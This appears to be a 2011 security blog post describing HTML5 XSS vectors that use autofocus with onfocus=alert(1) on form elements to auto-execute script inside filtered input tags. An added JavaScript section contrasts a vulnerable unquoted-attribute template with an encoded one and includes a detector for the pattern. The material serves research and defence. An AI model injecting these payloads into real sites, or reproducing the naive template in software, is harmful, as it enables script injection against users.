
Wednesday, March 16, 2011

HTML5 new XSS vectors

So I posted some new XSS vectors on Twitter and I thought I'd share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now. We have a brand new way of auto-executing XSS.

Normally, when you find an XSS hole inside an input element's start tag where < and > are filtered, you can't exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT> 

Here you can use style=xss:expression(alert(1)) or moz-binding etc., but that only works on a limited number of browsers. HTML5, however, lets us execute automatically like expressions do, but without CSS styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)> 

We use the "autofocus" attribute to focus our element and then the onfocus event to execute our XSS. This works without any excess tags. It seems you can use this method with any form-based element:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
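
The vectors above all rely on the same weakness: user input lands inside a start tag where it can add attributes, and a filter that only removes < and > never touches that. The following is an added example (not code from the original post or from The Spanner) showing, in JavaScript, the vulnerable unquoted-attribute template beside a hardened template that HTML-encodes the value into one fixed quoted attribute, plus a small check that flags markup where an element combines autofocus with an inline on* handler. The function names, the attribute tokenizer and the sample payloads are my own constructions.

```javascript
// Added example, not code from the original post. It shows why a filter that
// only strips "<" and ">" still allows the autofocus/onfocus vector inside an
// <input> start tag, how attribute-context encoding closes that hole, and a
// simple check that flags the auto-executing pattern in rendered markup.

// Naive filter: removes only angle brackets. Inside a start tag that is not
// enough, because the attacker can still add attributes.
function naiveFilter(input) {
  return String(input).replace(/[<>]/g, "");
}

// Vulnerable template from the post: user input lands unquoted inside the tag.
function renderNaive(userInput) {
  return '<input type="text" ' + naiveFilter(userInput) + '>';
}

// Attribute-context encoding: every character that could end the quoted value
// or the tag is turned into an entity.
const ATTR_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ENTITIES[ch]);
}

// Hardened template: the input only ever becomes the *value* of one fixed,
// double-quoted attribute; it can never introduce a new attribute name.
function renderSafe(userInput) {
  return '<input type="text" value="' + encodeAttr(userInput) + '">';
}

// Parse the attribute names of one start tag (quoted values are skipped over,
// so text inside value="..." is not mistaken for an attribute). Hypothetical
// helper; a real scanner would use a full HTML tokenizer.
function attributeNames(attrText) {
  const attrRe = /([^\s=\/>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = attrRe.exec(attrText)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Defensive check: true when any element carries autofocus together with an
// inline on* handler, the combination that fires without user interaction.
function hasAutofocusHandler(html) {
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const names = attributeNames(m[2]);
    if (names.includes("autofocus") && names.some((n) => /^on[a-z]+$/.test(n))) {
      return true;
    }
  }
  return false;
}

// Constructed sample inputs: the payload from the post and a quote-breaking variant.
const PAYLOAD = "AUTOFOCUS onfocus=alert(1)";
const QUOTE_PAYLOAD = '" autofocus onfocus=alert(1) x="';

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderNaive(PAYLOAD), hasAutofocusHandler(renderNaive(PAYLOAD)));
  console.log(renderSafe(PAYLOAD), hasAutofocusHandler(renderSafe(PAYLOAD)));
}
```

With the naive template the payload becomes a live autofocus/onfocus pair and the check flags it; with the hardened template the same bytes stay inert inside value="..." and the check stays quiet, because the attribute tokenizer only counts names outside quoted values. The design point is that the fix is not a better blocklist but a template that never lets untrusted text choose attribute names.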

Referred from The Spanner
